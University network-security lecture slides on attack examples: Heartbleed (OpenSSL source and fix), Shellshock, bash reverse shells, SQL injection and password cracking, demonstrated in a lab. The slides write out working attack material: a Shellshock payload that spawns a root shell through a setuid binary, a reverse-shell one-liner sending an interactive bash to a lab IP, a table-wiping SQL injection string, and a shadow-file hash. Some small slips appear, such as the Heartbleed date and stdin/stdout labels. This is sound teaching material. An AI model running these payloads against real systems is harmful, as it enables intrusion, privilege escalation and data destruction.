CS 4760
Network Security
Aaron Bloomfield (aaron@virginia.edu)
@github | ↑ | 
Attack Examples
Contents
Heartbleed
Heartbleed (2012)
- A problem in one implementation of the TLS protocol
- Specifically the OpenSSL library implementation
- Source code on github
- Specifically the OpenSSL library implementation
- Affected about one sixth of all websites
- Well known because:
- A serious attack
- A catch looking name and logo
Heartbleed
- RFC 6520 allows a client to send a Heartbeat Request message -- like a ping -- to the server
- It consists of a string and its size (as a 16-bit int)
- The server sends that message back
- In OpenSSL, the library did not check the size of the message
- So if you sent "bird" and 65,536, it would send 64Kb of data back
- Which would be a 64Kb dump of the server's memory
- So if you sent "bird" and 65,536, it would send 64Kb of data back
xkcd on Heartbleed (# 1354)
xkcd on Heartbleed (# 1354)
xkcd on Heartbleed (# 1354)
Seriousness
Some might argue that Heartbleed is the worst vulnerability found (at least in terms of its potential impact) since commercial traffic began to flow on the Internet.
- Forbes cybersecurity columnist Joseph Steinberg
Heartbleed Response Contruction
Source code
/* Allocate memory for the response, size is 1 byte
* message type, plus 2 bytes payload length, plus
* payload, plus padding
*/
unsigned int payload;
unsigned int padding = 16; /* Use minimum padding */
// Read from type field first
hbtype = *p++; /* After this instruction, the pointer
* p will point to the payload_length field */
// Read from the payload_length field from the request packet
n2s(p, payload); /* Function n2s(p, payload) reads 16 bits
* from pointer p and store the value
* in the INT variable "payload". */
pl = p; // pl points to the beginning of the payload content
if (hbtype == TLS1_HB_REQUEST)
{
unsigned char *buffer, *bp;
int r;
/* Allocate memory for the response, size is 1 byte
* message type, plus 2 bytes payload length, plus
* payload, plus padding
*/
buffer = OPENSSL_malloc(1 + 2 + payload + padding);
bp = buffer;
// Enter response type, length and copy payload *bp++ = TLS1_HB_RESPONSE;
s2n(payload, bp);
// copy payload
memcpy(bp, pl, payload); /* pl is the pointer which
* points to the beginning
* of the payload content */
bp += payload;
// Random padding
RAND_pseudo_bytes(bp, padding);
// this function will copy the 3+payload+padding bytes
// from the buffer and put them into the heartbeat response
// packet to send back to the request client side.
OPENSSL_free(buffer);
r = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding);
}Heartbleed Response Contruction
Mitigation
- Quick source code fix:
/* silently discard per RFC 6520 sec. 4 */
if (1 + 2 + payload + 16 > s->s3->rrec.length) return 0;- More extensive fixes were also implemented
- Re-generation of server keys
What was compromised?
- Server private keys
- Many certificates were revoked and re-issued
- Passwords
- Social insurance numbers (Canadian SSNs)
- "Anti-malware researchers also exploited Heartbleed to their own advantage in order to access secret forums used by cybercriminals" (Wikipedia)
Aftermath
Think about it, OpenSSL only has two [fulltime] people to write, maintain, test, and review 500,000 lines of business critical code.
- John Walsh, software engineer
- The Core Infrastructure Initiative was created by the Linux Foundation
- Provides funds to allow those working on it to develop full-time, and also pay for security audits
- Since superceded by the Open Source Security Foundation
Shellshock
Background: bash functions
One can declare functions in the bash shell:
$ foo() { echo "hello world"; }
$ declare -f foo
foo ()
{
echo "hello world"
}
$ foo
hello world
$ unset -f foo
$ declare -f foo
$ Pass function to child process
$ foo() { echo "hello world"; }
$ declare -f foo
foo ()
{
echo "hello world"
}
$ foo
hello world
$ export -f foo
$ /bin/bash
child$ declare -f foo
foo ()
{
echo "hello world"
}
child$ foo
hello world
child$ Toward a vulnerability
This works on the metasploit container
$ foo='() { echo "hello world"; }'
$ echo $foo
() { echo "hello world"; }
$ declare -f foo
$ export foo
$ /bin/bash
child$ echo $foo
child$ declare -f foo
foo ()
{
echo "hello world"
}
child$ foo
hello world
child$ Non-shellshock version
Run on, say, outer1
$ foo='() { echo "hello world"; }'
$ echo $foo
() { echo "hello world"; }
$ declare -f foo
$ export foo
$ /bin/bash
child$ echo $foo
() { echo "hello world"; }
child$ declare -f foo
child$ foo
bash: foo: command not found
child$ Toward a vulnerability
- A carefully crafted environment variable would be turned into a function in a child process
- This functionality was intentional at the time, and has since been removed
- This is part 1 of the vulnerability
- If the child is a shell, the parent doesn't have to be
- It just has to have environment variables set
- There is a part 2 to the vulnerability...
Shellshock exploit
This works on the metasploit container
$ foo='() { echo "hello world"; }; pwd;'
$ echo $foo
() { echo "hello world"; }; pwd;
$ export foo
$ /bin/bash
/root
child$ echo $foo
child$ declare -f foo
foo ()
{
echo "hello world"
}
child$ Notice the /root when the child process was run
Shellshock exploit
- A carefully crafted environment variable:
foo='() { echo "hello world"; }; pwd;'- Will turn into a function in a child process
- ALSO it will execute the last command (
pwd) when the child process starts:
$ /bin/bash
/root
child$ - This arbitrary code execution is the Shellshock vulnerability
- Executing the code (here
pwd) was due to a parsing error
- Executing the code (here
Shellshock exploit on metasploit
$ whoami
user
$ cat vul.c
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
int main() {
setuid(geteuid());
system("/bin/ls -l");
return 0;
}
$ gcc vul.c -o vul
$ sudo chown root vul
$ sudo chmod 4755 vul
$ ./vul
-rwsr-xr-x 1 root user 6567 2024-03-26 23:47 vul
-rw-r--r-- 1 root root 138 2024-03-26 23:46 vul.c
$ whoami
user
$ export foo='() { echo "hello world"; }; /bin/sh'
$ ./vul
sh-3.2# whoami
root
sh-3.2# chmod 4755
- This command will:
- Allow the owner (root) to read, write, and execute it (the '7' value)
- Allow the group to read and execute it (the first '5' value)
- Allow everybody else to read and execute it (the second '5' value)
- Also:
- The initial '4' digit is the set-uid bit
- Meaning it runs as if it were the owner (root)
- Many programs have this setuid bit set, including, at the time, ping:
root@metasploit:~# ls -l /bin/ping
-rwsr-xr-x 1 root root 30856 Dec 10 2007 /bin/ping
root@metasploit:~# Vulnerability Level
- Many processes, when running another command, invoke it via a shell
- Python:
os.system() - C/C++:
system()
- Python:
- This is often /bin/bash (although not always)
Vulnerable platforms
- CGI-based web server
- One can pass environment variables in the HTTP header
- CGI executes a shell for each time it runs the server-side program
- OpenSSH server
- The
SSH_ORIGINAL_COMMANDis parsed by the server as root, and then executed as the user - But with Shellshock, one can then execute any command as root
- The
- DHCP
- Some DHCP clients pass commands to bash
- With additional options to the DHCP request, Shellshock is activated
- And so on...
One ideal goal
- Is to execute a reverse shell on the host
- Which leads us to...
Reverse Shells
Reverse Shell
- A normal remote shell, such as telnet or ssh, has the client connecting to the server
- In a reverse shell, the roles are reversed
- The server, usually through an exploit, initiates a connection to the client (attacker)
- The attacker can then execute commands on the server
- Here is a list of some reverse shells
- Here is a list of even more reverse shells
File Descriptors
- An integer that the OS maps to an open file
- All programs start with three:
- 0: stdin (standard input)
- 1: stdout (standard output)
- 2: stderr (standard error)
- When you open a file, it creates a file descriptor starting at 3
- C makes these explicit; Python wraps them in a class
File Descriptors (fd.c)
$ cat fd.c
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
int main() {
char *output = "hello world\n";
int fd = open("fd.out",O_CREAT|O_WRONLY|O_TRUNC);
printf("file descriptor: %d\n",fd);
write(fd, output, 12);
close(fd);
return 0;
}
$ clang -o fd fd.c
$ ./fd
file descriptor: 3
$ chmod 644 fd.out
$ cat fd.out
hello world
$ - This is a very low-level interface; C's
fopen()is not as annoying to use
Redirection Output
$ echo "hello world" > output.txt
$ cat output.txt
hello world
$- This redirects the output of the command into
output.txt - Equivalent command:
echo "hello world" 1> output.txt- Note we are specifying which FD to use
- Although we are still using the default (stderr)
Redirection Input
$ a.out < input.txt
$- This redirects the contents of
input.txtas the input of thea.outprogram - Equivalent command:
$ a.out 0< input.txt- Note we are specifying which FD to use
- Although we are still using the default (stdin)
> versus >&
- The
>operator redirects output to a new "thing"- File, process, etc.
- The
>&operator redirects output to an already opened "thing"- An already open connection or pipe, etc.
- This is not file appending (that's
>>)
Combining FDs
- Putting
2>&1will redirect stderr to stdout:
$ ls -F
directory/ file
$ grep test *
grep: directory: Is a directory
file:this is a test
$ grep test * > output.txt
grep: directory: Is a directory
$ cat output.txt
file:this is a test
$ grep test * 2> output.txt
file:this is a test
$ cat output.txt
grep: directory: Is a directory
$ grep test * > output.txt 2>&1
$ cat output.txt
grep: directory: Is a directory
file:this is a testLinux & TCP Refresher
- Running
nc -l 4760will listen on port 4760, and print any output received - In Linux, we can write to
/dev/tcp/<IP>/<port>to send data to that IP & port
root@outer1:~# echo "hello world" > /dev/tcp/192.168.100.102/4760
root@outer1:~# root@outer2:~# nc -l 4760
hello world
root@outer2:~# Reverse Shell attempt 1
outer1 is the victim machine:
root@outer1:/# bash -i > /dev/tcp/192.168.100.102/4760
root@outer1:/# hostname
root@outer1:/# ls -l
root@outer1:/# exit
exit
root@outer1:/# outer2 is the attacker machine:
root@outer2:~# nc -l 4760
outer1
lrwxrwxrwx 1 root root 7 Jan 25 09:04 bin -> usr/bin
drwxr-xr-x 2 root root 4096 Apr 18 2022 boot
...
root@outer2:~# Reverse Shell attempt 1
- This only redirects stdin
Reverse Shell attempt 2
outer1 is the victim machine (note the 0<&1):
root@outer1:/# bash -i > /dev/tcp/192.168.100.102/4760 0<&1
root@outer1:/# ls -l
root@outer1:/# outer2 is the attacker machine:
root@outer2:/# nc -l 4760
hostname
outer1
ls -l
total 116
lrwxrwxrwx 1 root root 7 Jan 25 09:04 bin -> usr/bin
drwxr-xr-x 2 root root 4096 Apr 18 2022 boot
...
^C
root@outer2:/# Reverse Shell attempt 2
- This takes stdin from the attacker (outer2) and prints the output to the attacker
- This also printed the command on the victim machine
- But what about stderr?
Reverse Shell attempt 3
outer1 is the victim machine (note the 2<&1):
root@outer1:/# bash -i > /dev/tcp/192.168.100.102/4760 0<&1 2>&1
root@outer1:/# outer2 is the attacker machine:
root@outer2:/# nc -l 4760
root@outer1:/# hostname
hostname
outer1
root@outer1:/# ls -l
ls -l
total 116
-rwxr-xr-x 1 root root 9040 Mar 28 21:02 a.out
lrwxrwxrwx 1 root root 7 Jan 25 09:04 bin -> usr/bin
...
root@outer1:/# ^C
root@outer2:/# Reverse Shell attempt 3
The final version:
bash -i > /dev/tcp/192.168.100.102/4760 0<&1 2>&1It's that easy, and can be run as a non-root user
Password Cracking
Before proceeding...
Go over the fuzzing slide column in the Web Security slide set
Step 1: Obtain the password database
- Shell access on the remote system (reverse shell, allowed access, etc.)
- Not in /etc/passwd, but in /etc/shadow (often not readable):
- These are hashed and salted
- Not in /etc/passwd, but in /etc/shadow (often not readable):
user:$y$j9T$wmEh7N6.PIYqdbr52Fqpj1$owbqqdSR3KqbONd59bnwWni/yvl3Yw4ahqFTiiwfQxC:19828:0:99999:7:::- Script that "leaks" information
- How the original Silk Road was supposedly attacked
- Fuzz for password files on the server
- SQL injection attack
- Bypass password entirely (SSH MITM, remote shell, etc.)
Even Better Password "Cracking"
- Obtain the passwords, either plaintext or encrypted/hashed, from a dark web source
Vulnerable script for SQL injections
- Let's imagine that your web script asks for your userid
- Then does a select command on that value
- Pseudo-code:
var userid = getUseridFromWebForm()
var query = "select * from course where userid='" +
userid + "';"
var result = databaseQuery (query)
doSomethingWithTheResult (result)- This has a SQL injection attack vulnerability
- Next, we'll see an exploit
Normal operation
- If we enter 'asb2t' into the web form, we will get the following SQL command:
select * from course where userid='asb2t'; - Which works as desired
SQL injection attack exploit
- What if we enter the following as our userid:
'; truncate course; -- - At that point, our SQL command is as follows:
select * from course where userid=''; truncate course; -- '; - Which does not work as desired
SQL injection attack exploit
- Our SQL injection attack query:
select * from course where userid=''; truncate course; -- '; - The DB will perform two database operations (a select then a delete), and then see a comment at the end of the statement
- The DB function the script calls might return a value or it might not
- At this point, we have deleted everything from the table
xkcd # 327 on SQL injection attacks
Exploits of a Mom
SQL injection attack exploit
- This is not stealthy - the DB probably won't work right if everything has been deleted
- Another option is to enter your own credentials or data
- Most likely it is to steal data
Case Study: Ashley Madison Attack
- Ashley Madison data breach in 2015
- This is the site that peddled extra-marital affairs
- The hackers threatened to release the site's 60 Gb DB info unless the site was closed down
- No ransom was requested!
- They did reveal the information, which led to embarrassment and some suicides
- Interestingly, almost all of the "female" members were bots...
- Passwords were not salted, and no password restrictions were imposed
Better SQL Injections
- SQLMap at sqlmap.org
- It does it all for you
- Just specify a few parameters, and away it goes
Password cracking with a salt
- High budget: have a multi-processor system that will compute all hashes of all passwords with a salt
- The 3-letter agencies have this budget
- Low budget:
- Figure out the salt (next slide), and use brute force tools to determine the password
Determine the salt
- Some systems (Django) use the "security_key" (or similar) as the salt
- In /etc/shadow on UNIX systems:
user:$y$j9T$wmEh7N6.PIYqdbr52Fqpj1$owbqqdSR3KqbONd59bnwWni/yvl3Yw4ahqFTiiwfQxC:19828:0:99999:7:::- Take the second field, and split on the dollar sign
ythe algorithm used (y is yescrypt)j9Tis a parameter to the yescrypt algorithmwmEh7N6.PIYqdbr52Fqpj1is the salt (aka nonce)owbqqdSR3KqbONd59bnwWni/yvl3Yw4ahqFTiiwfQxCis the encoded (encrypted and/or hashed) password
Step 2: Crack the password
- Popular tools:
- The 3-letter agencies will have resources to do this much faster than regular individuals
CS 4760 Network Security Aaron Bloomfield (aaron@virginia.edu) @github | ↑ | Attack Examples